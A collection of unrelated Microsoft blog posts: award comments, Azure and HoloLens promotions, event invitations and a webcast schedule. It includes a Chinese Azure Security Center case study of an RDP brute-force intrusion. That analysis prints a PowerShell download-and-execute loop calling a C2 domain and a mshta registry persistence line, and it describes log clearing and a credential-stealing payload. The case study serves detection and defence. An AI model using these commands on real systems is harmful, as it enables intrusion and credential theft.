Jaliya Udagedara: "Good article with sample code."

Also worth a mention were the other entries this month:

  • C# : Implementing a Linked List by AnkitSharma007
    Jaliya Udagedara: "Good explanation on implementing Linked Lists using C#."
    Khanna Gaurav: "Good one to learn linked list"
  • C# - Tetris.Net by .paul.
    Khanna Gaurav: "Great article to learn Windows Form and developing game"
    Afzaal Ahmad Zeeshan: "A great article, as always, but Paul do try to explain as well, code dumps are not useful most of the times; consider MSDN Gallery for code samples."
    Jaliya Udagedara: "Would have been great if the code is described."
  • Windows DataGridView with inline edit and remove buttons by Karen Payne
    Jaliya Udagedara: "Nice article with complete source code. Isn't it great."
    Khanna Gaurav: "Should be useful for developer using dataGridView"
  • How to create a shared library by Karen Payne
    Jaliya Udagedara: "Good article. Maybe we can change the article title to be more aligned with the content?"


 Wiki and Portals Technical Guru - February 2018 
Gold Award Winner Rajeesh Menoth TechNet Wiki - Top Contributors Awards
Richard Mueller: "An excellent way to recognize TechNet Wiki Gurus. Thanks."
Ronen Ariely (aka pituach): "Nice statistics. Can be very useful if it will be updated regularly. Thanks for sharing and for the hard work in collecting the statistics. Well done!"
Kia Zhi Tang: "Thank you for the work"


 Windows PowerShell Technical Guru - February 2018 
Gold Award Winner H Shakir Exchange Server Monitoring Event Logs Status Report in Daily Email Notification
Joseph Moody: "Good tool! Thank you for writing this one as well."
Adam Fowler: "Thanks for submitting. There's some spacing issues in the first code example, and I think a daily list of logs would be more valuable than the last 10, but it's a good example of what's possible."
Richard Mueller: "Good use of Wiki guidelines. A great idea to keep admins informed of Exchange Server issues. Are the two file names consistent in the article?"
Kia Zhi Tang: "Thank you for sharing."


 Windows Server Technical Guru - February 2018 
Gold Award Winner Subhro Majumder Active Directory Replication Metadata
Mark Parris: "Good insights into on-premises AD Replication, should be understood by all Active Directory admins."
Afzaal Ahmad Zeeshan: "A great write up for anyone to read and understand, explanation was clean."
Joseph Moody: "Awesome write up showing some of the things few admins get to see!"
Richard Mueller: "Excellent steps to monitor AD replication. Good use of Wiki guidelines. Good explanation of linked and non-replicating attributes."
Kia Zhi Tang: "Thank you for sharing. Enjoy reading with good referencing."
Silver Award Winner H Shakir Windows Server 2016: DHCP
Mark Parris: "Graphical instructions on how to install a DHCP server, would be nice to see the command line syntax."
Afzaal Ahmad Zeeshan: ""
Joseph Moody: "Very good article! I think your headings are a bit off though - other than that, it was great to read."
Richard Mueller: "Detailed step by step instructions with images to setup and configure DHCP."
Kia Zhi Tang: "Thank you for sharing the DHCP role installation walkthrough."


A huge thank you to EVERYONE who contributed an article to last month's competition.


Best regards,
Pete Laker


More about the TechNet Guru Awards:

Microsoft Translator 使い方ガイド その2:Presentation Translator 【3/27更新】


外国語で書かれているプレゼンテーション資料が多くてお困りの方、または外国語でプレゼンテーション資料を作成しなければならない場合、「Presentation Translator」を活用してみましょう!


Power Point のスライドの翻訳ができるだけでなく、自分がプレゼンテーションしている言葉を、リアルタイムで翻訳して画面に表示することができます。

このツールは Power Point のアドイン機能ですので、こちらのビデオを見ながら「Presentation Translator」をインストールして、ぜひ使い方をマスターしてください!




Azure Security Center 如何揭開可疑的 PowerShell 攻擊


撰 /Cloud Security Investigations & Intelligence - Microsoft Azure Security

為了紀念國家網絡安全意識月(NCSAM),我們在這系列發布了一個新帖子,重點介紹 Azure 安全中心檢測、調查和緩解的實際攻擊。 這篇文章是關於使用 PowerShell 運行惡意代碼,並收集用戶憑證的攻擊。 但在我們開始之前,以下是系列中的其他貼文的回顧,其中安全中心檢測到:

在這篇文章中,我們將介紹另一個有趣的現實攻擊場景,這個場景被 Azure 安全中心發現並由我們的團隊調查。受影響的公司名稱、所有計算機名稱和所有用戶名都已更改以保護隱私。 這種特殊攻擊採用 PowerShell 來運行內存中的惡意代碼,目的是通過密碼竊取,按鍵記錄,剪貼板抓取和屏幕捕獲來收集憑證信息。我們將列出以 RDP Force 攻擊開始、並導致在註冊表中設置和配置持續的自動啟動(ASEP)。本案例研究提供了有關攻擊動態的深入見解,以及如何檢測和防止您的環境中發生類似攻擊的建議。

初始 Azure 安全中心警報和詳細信息

只要互聯網連接的計算機遠程管理已經存在,黑客就會繼續努力發現遠程桌面協議(RDP)等遠程管理服務,以便他們可以通過強力攻擊破解密碼。 我們的案例從客戶的 Azure 安全中心控制台開始,提醒 RDP 暴力活動以及可疑的 PowerShell 活動。

在下面的Azure安全中心屏幕截圖中,您可以跟踪從下到上的按時間順序進展,因為“失敗的RDP暴力攻擊”警報之後是一個“成功的RDP暴力攻擊”警報 - 表示有人通過RDP 猜到了用戶密碼。 這個惡意的 Brute Force 登錄隨後會出現幾個關於異常 PowerShell 活動的警報。


在我們研究初始成功的 RDP 暴力攻擊警報時,我們會看到攻擊時間、受攻擊的帳戶、嘗試發起攻擊的IP地址(在我們案例中為意大利)以及與 Microsoft Threat Intel 的“ RDP暴力強迫“報告連結。


成功登錄後,當我們深入到高級嚴重性警報頁面時,Azure 安全中心會按時間順序顯示攻擊者成功登錄後發起的每個命令行:



通過警報提供的信息,我們的調查團隊與客戶合作,檢查從攻擊者初次登錄,獲取帳戶登錄日誌(事件ID 4624)進程創建日誌(事件ID 4688)。 從最早的登錄數據中,我們看到使用各種用戶名和密碼組合的連續 RDP 強力嘗試。 其中大多數失敗嘗試導致事件 ID 4625(一個帳戶登錄失敗),狀態碼為 0xc000006d(嘗試登錄無效),並且 Substatus 代碼 0xc0000064(指定的帳戶不存在)。


09-06 年的上午 10 點 13 分左右,我們開始看到 Substatus 代碼的變化。 我們現在看到使用者用戶名“ContosoAdmin”呈現不同的狀態代碼:0xc000006a(密碼錯誤)。 隨後使用帳戶“ContosoAdmin”成功登錄類型 3 並輸入 10 (遠程交互)登錄。 登錄似乎源自意大利的 IP 地址(。


在登錄後查看進程創建活動。 攻擊者首先發出“whoami”命令,顯示當前登錄用戶的身份。 然後,他們使用網絡組“Domain Admins”/ domain命令列出“Domain Admins”組的成員。 緊接著顯示所有遠程桌面服務會話的“qwinsta”命令。 然後啟動 Taskmgr(Windows任務管理器)以查看或管理進程和服務。

大約一分鐘後,另一個 PowerShell 命令被執行。 這個命令與 Base64 編碼的字符串混淆,這些字符串被額外包裹在 Deflate 壓縮算法中。

注意:我們將深入研究此命令的作用,因為我們稍後會在此文章中解碼 Base64。


大約3分鐘後,攻擊者登出機器。 但在註銷之前,他們會嘗試通過清除所有事件日誌來清理其軌跡。 這是通過內置的 wevtutil.exe(Windows事件命令行實用程序)完成的。 首先,使用“el”或“enum-logs”開關枚舉所有事件日誌。 然後使用“cl”或“clear-log”開關清除所有事件日誌。 以下是攻擊者發起的事件清除命令的一部分。



仔細看看 Base64 編碼的 PowerShell 命令

從攻擊者的初始命令中解碼編碼的 Base64 部分,可以看到更多的 Base64 編碼命令,這些命令顯示:

嵌套的 Base64 混淆。
創建一個僅限註冊表的 ASEP(自動啟動擴展點)作為持久性機制。
由於 ASEP 和參數只在系統註冊表中,所以命令執行發生在“內存中”,沒有文件或 NTFS 工件。


解碼 Base64 揭示註冊條目和更多的 Base64 字符串解碼...image



  • 該命令首先儲存參數信息,以供後續命令從 HKLM Software Microsoft Windows CurrentVersion 之下名為“SeCert”的註冊表位置讀取。




  • 上述註冊表中的 Base64 值解碼為來自惡意 C2(命令和控制)域(mdmservers [.] com)的下載指令。

while(1){try{IEX(New-Object Net.WebClient).DownloadString('hxxp[:]//mdmservers[.]com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}

  • 然後,攻擊者的指令通過名為“SophosMSHTA”的註冊表 ASEP(自動啟動擴展點)在“HKLM Software Microsoft Windows CurrentVersion Run”項下創建一個永久性的機制。


pan style="color: #c95151;">"SophosMSHTA"="mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion SeCert).SeCert);powershell -E $x""",0,True)(window.close)"

  • 註冊表的持久性能確保每次啟動或重啟時計算機時都會執行惡意指令。
  • 註冊表 ASEP 啟動 Microsoft 腳本引擎(mshta.exe)。
  • 反過來,Mshta.exe 運行 PowerShell.exe,然後讀取並解碼 HKLM SOFTWARE Microsoft Windows CurrentVersion - >“SeCert”的值。
  • SeCert 的註冊表值告訴 PowerShel 從 'hxxp [:] // mdmservers [.] com' 下載並啟動惡意腳本。


一旦攻擊者設置了持久性機制並註銷,主機的下一次重啟就會啟動 PowerShell,從'hxxp [:] // mdmservers [.] com' 下載並啟動惡意的負載。 這個惡意腳本包含執行特定功能的各個部分。 下表詳細說明了惡意負載的主要功能:



%TEMP% Applnsights_VisualStudio.txt


%TEMP% key.log


%TEMP%39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg


%TEMP%39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg

檢查是否安裝了Google Chrome瀏覽器。 如果是這樣,請收集Chrome緩存中的所有密碼並保存到以下位置:

%TEMP% Chrome.log

檢查是否安裝了Mozilla Firefox瀏覽器。 如果是這樣,收集來自Firefox緩存的所有密碼並保存到以下位置:

%TEMP% Firefox.log




  1. 當成功的 RDP Brute Force 攻擊中管理員帳戶遭到入侵時,會發生於初始入口。
  2. 攻擊者然後執行一個 Base64 混淆的 PowerShell 指令,該命令設置在啟動時啟動的註冊表ASEP。
  3. 然後,攻擊者通過使用以下命令刪除所有事件日誌來清除其活動的證據:wevtutil.exe -cl <eventlogname>。
  4. 受影響的主機啟動或重啟時,它會在HKLM SOFTWARE Microsoft Windows CurrentVersion Run 中啟動惡意註冊表 ASEP
  5. 註冊表 ASEP 啟動 Microsoft 腳本引擎(mshta.exe)。
  6. 反過來,Mshta.exe 運行 PowerShell.exe,然後讀取並解碼 HKLM SOFTWARE Microsoft Windows CurrentVersion的值 - >“SeCert”
  7. “SeCert” 的註冊表值告訴 PowerShell 從'hxxp [:] // mdmservers [.] com' 下載並啟動惡意腳本“
  8. 然後,來自hxxp [:] // mdmservers [.] com的惡意代碼將執行以下操作:
  • 將剪貼板中的內容剪切到:%temp% Applnsights_VisualStudio.txt
  • 截獲所有按鍵:%temp% key.log
  • 進行初始屏幕截圖並將 .jpg 保存到:%temp% 39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg
  • 在鍵入某些財務或帳戶憑證相關關鍵字時進行後續屏幕截圖,並將.jpg保存到以下位置:%temp% 39F28DD9-0677-4EAC-91B8-2112B1515341 yyyymmdd_hhmmss.jpg
  • 檢查是否安裝了Google Chrome 瀏覽器。 如果是,請收集 Chrome 緩存中的所有密碼並保存到:%temp% Chrome.log
  • 檢查是否安裝了Mozilla Firefox 瀏覽器。 如果是這樣,收集 Firefox 緩存中的所有密碼並保存到:%temp% Firefox.log


Azure Security Center 安全中心如何將它一網打盡

很明顯,攻擊者通過特殊手段隱藏了他們的活動;確保使用內置 Windows 可執行文件(PowerShell.exe,Mshta.exe,Wevtutil.exe)的所有進程執行,使用混淆並存儲在註冊表中的命令參數,以及刪除所有事件日誌以清除其跟踪。但是,這一努力並未阻止 Azure 安全中心檢測,收集和報告此惡意活動。

正如我們在本博客開始時所看到的,Azure 安全中心檢測到此攻擊的所有階段,提供了最初的RDP Brute Force 攻擊的詳細信息,並揭示了攻擊者發布的各個階段的所有命令。您還會在Alerts 中註意到,在攻擊的每個階段,所有混淆的命令行都被破譯,解碼並以明文顯示。這種寶貴且節省時間的信息有助於安全響應調查人員和系統管理員回答“發生了什麼?”、“這是什麼時候發生的?”、“他們是怎麼進來的?”、“他們進來時做了什麼?”、 “他們從哪裡來?”等問題。此外,調查人員還可以確定組織中的其他主機是否可能通過此受損主機的橫向移動而受到威脅。能夠看到這次攻擊的大局,也可以幫助回答動機問題,比如“他們之後要的是什麼?”在我們的案例中,主要目的似乎是憑藉竊取金錢或智力的目標。

在我們的所有調查中,Azure 安全中心在幫助確定關鍵細節(如初始入侵/入侵向量、攻擊源、可能的橫向移動以及攻擊範圍)方面發揮了關鍵作用。安全中心還詳細介紹了由於文件系統覆蓋或日誌保留/存儲限製而可能隨時間丟失的工件。 Azure 安全中心利用最新的機器學習和大數據分析功能,可以從各種來源獲取、存儲、分析和破譯數據,這對安全分析師、事件響應者和律師等專業人員都是非常寶貴的資源。

  • 密碼策略:攻擊者通常使用廣泛可用的工具發動暴力攻擊,這些工具利用詞表和智能規則集智能地自動猜測用戶密碼。所以,第一步是確保為所有虛擬機使用複雜的密碼。一個複雜的密碼策略應該實施頻繁的密碼更改。詳細了解執行密碼策略的最佳做法
  • 端點:端點允許從互聯網與您的虛擬機進行通信。在 Azure 環境中創建虛擬機時,默認會創建兩個端點來幫助管理虛擬機,遠程桌面和 PowerShell。建議刪除不需要的任何端點,並只在需要時添加它們。如果您打開了端點,建議您盡可能更改使用的公共端口。創建新的 Windows VM 時,默認情況下遠程桌面的公共端口設置為“自動”,這意味著隨機公共端口將自動為您生成。在此獲取有關如何在 Azure 中的傳統 Windows 虛擬機上設置端點的更多信息。
  • 啟用網絡安全組:Azure安全中心建議您啟用網絡安全組(NSG)(如果尚未啟用)。  NSG 包含訪問控制列表(ACL)規則的列表,允許或拒絕到虛擬網絡中的 VM 實例的網絡流量。端點 ACL 允許您控制要允許通過該管理協議訪問的地址的哪個 IP 地址或 CIDR 子網。了解有關如何使用網絡安全組過濾網絡流量以及在 Azure 安全中心中啟用網絡安全組的更多信息。
  • 使用 VPN 進行管理:VPN 網關是一種虛擬網絡網關,通過公共連接將加密流量發送到本地位置。您還可以使用VPN網關通過Microsoft網絡在Azure虛擬網絡之間發送加密流量。要在您的Azure虛擬網絡和本地站點之間發送加密的網絡流量,您必須為您的虛擬網絡創建一個 VPN 網關。站點到站點和點對點站點網關連接允許我們完全刪除公共端點並通過安全VPN 連接直接連接到虛擬機。
  • 網絡級身份驗證(NLA):可以在主機上使用 NLA,以允許從域身份驗證用戶創建遠程桌面會話。由於 NLA 要求連接用戶在與服務器建立會話之前進行身份驗證,所以 Brute Force,Dictionary Attacks和密碼猜測攻擊可以得到緩解。
  • 準時(JIT)網絡訪問:準時Azure安全中心中的虛擬機(VM)訪問可用於幫助保護和鎖定到Azure虛擬機的入站流量。 JIT網絡訪問可以通過限制端口打開的時間來減少暴力攻擊,從而減少攻擊風險,同時在需要時提供連接到虛擬機的簡便訪問。


PowerShell 團隊已經完成了大量工作,使 PowerShell 成為最安全、透明的腳本語言。以下鏈接詳細討論如何解決 PowerShell 問題:


了解有關 Azure 安全中心的更多信息,請參閱以下內容:


東宝と日本マイクロソフトが連携し 、『日比谷シャンテ』と『ゴジラ』を Azure AI と MR で変革 – Azure & MR(Mixed Reality) のテクノロジー活用について –


執筆者:河原田羽乃子(日本マイクロソフト株式会社 クラウド&エンタープライズビジネス本部 エグゼクティブプロダクトマネージャー)


東宝株式会社と日本マイクロソフト株式会社は連携し、3 月 23 日(金)にリニューアルオープンした「日比谷シャンテ」において、マイクロソフトのクラウドプラットフォーム「Microsoft Azure」の AI(人工知能)サービスと、Mixed Reality(複合現実/MR)を実現する「Microsoft HoloLens」を活用した、新しい「ゴジラ」の体験と近未来の消費体験を創造するプロジェクト「HIBIYA 2018」を本日開始し、2018 年 5 月下旬より、そのショーケースを一般公開します。

詳細はこちら :https://aka.ms/press-0327




新しく生まれ変わる日比谷の街にゴジラが上陸!日本初、Microsoft HoloLens を使った屋外アトラクション、『Godzilla Nights』(ゴジラ ナイツ)を開催

Mixed Reality の技術により、まるで目の前にゴジラがいるかのような体験ができる、Microsoft HoloLens を活用した日本初の屋外アトラクションイベント「Godzilla Nights」を、5 月下旬に 1 週間、日比谷シャンテ前の広場「日比谷ゴジラスクエア」で開催します。参加者が Microsoft HoloLens を装着すると、118.5m の圧倒的な存在感で迫りくるゴジラ(『シン・ゴジラ』)が出現。巨大不明生物特設災害対策本部(通称:巨災対)がミサイルによる日比谷防衛作戦を立案。まるでその場にいるかのような臨場感で体験できます。体験中のミサイル発射を制御する音声認識と、防衛戦確認の際の自然言語処理などに、Microsoft Azure の AI サービスも活用します。

本イベントで使用する、 MR アプリケーションは Microsoft の Cloud サービス、Microsoft Azure に連携します。具体的には、Microsoft Cognitive Services の音声認識を通じてユーザーの声に反応し、Bot Service により音声 Chat Bot が可能になります。これにより、体験中のミサイル発射を音声認識で制御したり、防衛戦確認に自然言語処理を活用することが可能となります。(予定)



また、株式会社 モメンタム ジャパンが企画・運営を行っています。



















Azure テクノロジーを活用した「近未来の店舗」について

顧客満足度の向上とともにビジネスの効率化に寄与する Azure の AI である Microsoft Cognitive Services などを活用したサービスを日比谷シャンテ内に展開します。以下 3 つのサービスは今後他商業施設に展開していく予定です。


1.  お客様に最適な映画を AI がご提案:

株式会社アロバ(https://www.arobaview.com/)の「アロバビューコーロ」が、Microsoft の Cognitive Services の Face API を利用し、 ネットワークカメラで休憩スペースに滞在されているお客様の表情から、 年齢、性別、感情を分析します。また、その属性に対して最適な映画の予告編を自動生成し、サイネージに表示する仕組みについては株式会社モメンタム ジャパンがサポートしています。





2. 飲食店の空き状況をリアルタイムでサイネージに表示:

株式会社バカン(https://www.vacancorp.com/)の「Vacant-First Platform」は、すべての空席情報を集約する「Vacant-First」(ベイケント・ファースト)を実現する空席検索プラットフォームです。画像分析やセンサーによって空席情報が取得され、空席データが Microsoft Azure の PaaS サービスである Web App や Cosmos DB を活用したデータベースを通じて、デジタルサイネージに空き情報が表示されます。本サービスは、すでに横浜高島屋およびジョイナスに導入されています。
















3. 注文0分、会計0分、待ち時間0体験

地下 2 階のリンガーハットでは、Azure を活用したボクシーズ株式会社が開発した「Putmenu」(http://putmenu.com/)がシャープ製の POS に連携し、独自の IoT 技術により携帯のアプリケーションで注文から会計までを行うことが可能です。

また Microsoft Translator により 12 言語でアプリを操作することが可能です。また、オーダーデータやお客様評価は、Azure のデータベースに格納されマーケティング等に活用することも可能です。また、本サービスはイオンモール幕張新都心店やハウステンボスの一部の店舗に導入されています。




















株式会社モメンタムジャパン 担当:宮本






「Microsoft Azure」の AI(人工知能)を活用したサービスや Microsoft HoloLens のアプリケーションなどを開発しませんか?


渋谷ヒカリエ内の Azure Antenna では AI などの最新テクノロジーを活用するためのワークショップを毎日実施しています。







*Cognitive, AI や PaaS で検索してみてください。



TNWiki Article Spotlight – Getting Started With ASP.NET Core 2.0 Identity And Role Management


ASPNET Core LogoWelcome to another Tuesday TNWiki Article Spotlight.

ASP.NET Core 2.0 continues to evolve eight months after its official release. When Microsoft announced ASP.NET Core almost two years ago, many people wondered why we needed another ASP.NET. As we come to learn all ASP.NET Core 2.0 offers, it continues to show new approaches to coding.

In today’s blog post, we will look at how identity and role management works in ASP.NET Core 2.0. To do this, we will use the TechNet Wiki article Getting Started With ASP.NET Core 2.0 Identity And Role Management by Syed Shanu.

In the article, Syed takes the reader through creating a new web MVC project in Visual Studio 2017 using Individual User Accounts as the authentication model. To work with this model, Syed utilizes ASP.NET Core Identity Services. In the project, he creates users and roles, saves them to a database, and then uses these permissions to authenticate users on the website.

While all the steps are clearly documented, the article also has a link to the source code of the demo application so you can see how the project is configured.

If you want to learn about ASP.NET Core 2.0 Identity And Role Management, start with this post.

by Ken Cenerelli (TwitterBlogMSDN ProfileMVP Profile)

Pozvánka na konferenci Global Azure Bootcamp v Praze


Rok se sešel s rokem a tradičně přinesl řadu zajímavých novinek. Rád bych vás tímto pozval na konferenci Global Azure Bootcamp 2018, která se koná tento rok v Praze a pořádám ji ve spolupráci s Robertem Hakenem (HAVIT).

Společnými silami a s pomocí předních českých odborníků na platformu Microsoft Azure jsme sestavili program, který vám pomůže nahlédnout na nejzajímavější azure služby, seznámíte se s aktuálními novinkami a chybět nebudou přednášky plné praktických tipů a zkušeností.

Naše pozvání přednášet na Global Azure Bootcamp přijali například Jiří Činčura, David Gešvindr, Tomáš Herceg a odborníci z Microsoftu a předních DEV/IT firem v Čechách.


  • Přehled platformy Microsoft Azure
  • Novinky v Azure PaaS
  • Azure Cosmos DB
  • Azure SQL
  • Zkušenosti s Azure CDN
  • Zkušenosti s migrací do Azure
  • Azure Bot Service
  • Power BI a otevřená data
  • Kubernetes
  • Azure IoT hub
  • Další alternativní přednášky nejen o Azure

Pre-Day Workshop

Marek Chmel, Vladimír Mužný a Michal Marusan rozjedou GAB 2018 ve velkém stylu už v pátek od 10 hodin workshopem Utilizing Azure Services for Data Science and Machine Learning. Na tento workshop je omezený počet míst a nutná samostatná registrace.

Veškeré informace a možnost registrace na konferenci naleznete na oficiální stránce konference Global Azure Bootcamp 2018.

Miroslav Holec
27. března 2018

April 2018 Partner Learning Schedule


Welcome to the Asia Partner Learning Blog. In April, we will schedule the following webcasts for Microsoft Partners. You can plan ahead and register the events by clicking the titles.

Title Event Start Time Event Time Zone
Enhance Your Business with Skype for Business Online Academy 02-Apr-18 9:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Grow, Manage and Increase Profitability with Azure Internal Use Rights 02-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Skype for Business 03-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Introduction to HA/DR Solution in SQL Server 2017 03-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Microsoft Azure IaaS 03-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Cortana Intelligence Suite: Big Data Analytics 04-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Exchange Online 04-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Cortana Intelligence Suite: Azure Data Factory 05-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
What's New & Highlights in Business Applications 10-Apr-18 9:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Microsoft 365 Deployment 10-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Hybrid Cloud Infrastructure: Windows Server 2016 10-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Adopting Microsoft 365 Powered Device: Deployment 11-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Cortana Intelligence Suite: Machine Learning & Cognitive Services 11-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Enterprise Mobility Suite: Technical Deep Dive on Microsoft Intune 11-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Hybrid Cloud Infrastructure: Containers and Nano Server 11-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Exchange Online Hybrid Deployment Fundamentals 11-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Dynamics 365: Internal Use Rights 12-Apr-18 9:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Building Applications Using Microsoft Graph 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Cortana Intelligence Suite: Big Data Analytics 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Enterprise Mobility Suite: Technical Deep Dive on Azure Information Protection & Identity-Driven Security 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Hybrid Cloud Infrastructure: Storage and Networking 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Technical Deep Dive on Migrating to Exchange Online 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
What’s New in Cloud Application Development 12-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Cortana Intelligence Suite: Machine Learning & Cognitive Services 13-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
SharePoint Online: Moving to the Cloud with SharePoint 2016 13-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Cortana Intelligence Suite: Machine Learning & Cognitive Services 13-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Hybrid Cloud Management & Security: Introduction and Log Analytics 16-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Dynamics 365 Customer Engagement: Technical Onboarding 17-Apr-18 9:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Microsoft 365 Management 17-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Hybrid Cloud Management & Security: Automation and Security 17-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Migrating Applications to Microsoft Azure 17-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
SharePoint Online: SharePoint 2016 Hybrid Search 17-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Adopting Microsoft 365 Powered Device: Management 18-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
SQL Migration Oracle to SQL Server Using SSMA 18-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Migrating Application Databases to Microsoft Azure 18-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Technical Deep Dive on Hybrid Cloud Storage 18-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to HA/DR Solution in SQL Server 2017 19-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Building, Monitoring and Analysis Apps for Office 365 19-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Migrating Application Authentication to Microsoft Azure 19-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
What's New in Azure Infrastructure as a Service 19-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Migrating Open Source Applications to Microsoft Azure 20-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Getting Started with Azure Stack 23-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Dynamics 365 Customer Engagement: Basics of Customization 24-Apr-18 9:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Getting Started with Office 365 App Development 24-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Introduction to Microsoft 365 Security and Compliance 24-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Technical Deep Dive on Migrating to Exchange Online 24-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Azure Stack Architecture & Deployment 24-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Microsoft 365 Deployment 24-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Skype for Business Online: Defining Network Requirements for SfBO 25-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Azure Stack Management and Configuration 25-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Microsoft 365 Management 25-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Building Add-ins for SharePoint Online and Office Online 26-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Introduction to Power BI 26-Apr-18 10:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
SharePoint Online: Moving to the Cloud with OneDrive for Business 27-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Introduction to Project Online 30-Apr-18 9:30:00 AM (UTC+05:30) Chennai, Kolkata, Mumbai, New Delhi
Introduction to Exchange Online 30-Apr-18 10:00:00 AM (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi

Office 365 og Windows 10 kapacitetsopbygning med Hippomini


Office 365 og Windows 10 indeholder utroligt mange muligheder i forhold til samarbejde, undervisning og læring, som på rigtig mange skoler landet over blot venter på at blive brugt. Derudover stiller det kommende Aula og læringsplatformene større krav til, at skolerne er klar til at bruge værktøjer ’i skyen’ i det daglige.

Hippomini tilbyder i samarbejde med Microsoft skoleforvaltninger et uforpligtende møde om de muligheder Windows 10 og Office 365 giver for kommuner og skoler på både den korte og lange bane, kapacitetsopbygning og hvordan værktøjerne kan bringes i spil. Fra administration, over lokal tværfaglig planlægning til teamsamarbejde og forberedelse, men vigtigst af alt, hvordan Office 365 og Windows 10 skaber didaktisk merværdi i det konkrete læringsmiljø på skolerne.

Vi arbejder i Hippomini for at give skoler og kommuner de bedste forudsætninger for at udnytte de mange muligheder i Windows 10 og Office 365. Det gør vi ved at give skoler, ledere, lærere og elever blivende kompetencer og forankre de læringsressourcer, vi bruger i vores opgaveløsning.

Vi kalder det praksisnær kapacitetsopbygning og workshops.

